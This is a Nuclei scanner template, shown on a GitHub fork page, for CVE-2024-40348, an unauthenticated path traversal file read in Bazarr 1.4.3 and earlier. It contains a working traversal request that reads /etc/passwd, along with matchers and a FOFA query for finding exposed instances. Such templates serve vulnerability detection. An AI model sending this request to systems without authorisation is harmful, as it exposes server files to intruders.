forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2024-40348.yaml
More file actions
68 lines (60 loc) · 1.66 KB
/
CVE-2024-40348.yaml
File metadata and controls
68 lines (60 loc) · 1.66 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
id: CVE-2024-40348
info:
name: Bazarr < 1.4.3 - Arbitrary File Read
author: s4e-io
severity: high
description: |
Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
impact: |
Unauthenticated attackers can read arbitrary files from the Bazarr server via path traversal.
remediation: |
Update Bazarr to version 1.4.4 or later.
reference:
- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
- https://www.bazarr.media/
- https://github.com/bigb0x/CVE-2024-40348
classification:
cve-id: CVE-2024-40348
cwe-id: CWE-22
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
cvss-score: 8.2
epss-score: 0.93603
epss-percentile: 0.99829
cpe: cpe:2.3:a:bazarr:bazarr:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: morpheus65535
product: bazarr
fofa-query: title=="Bazarr" && icon_hash="-1983413099"
tags: cve,cve2024,bazarr,lfi,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/login"
matchers:
- type: word
part: body
words:
- "<title>Bazarr</title>"
- 'content="Bazarr'
- "window.Bazarr"
condition: or
internal: true
- method: GET
path:
- "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200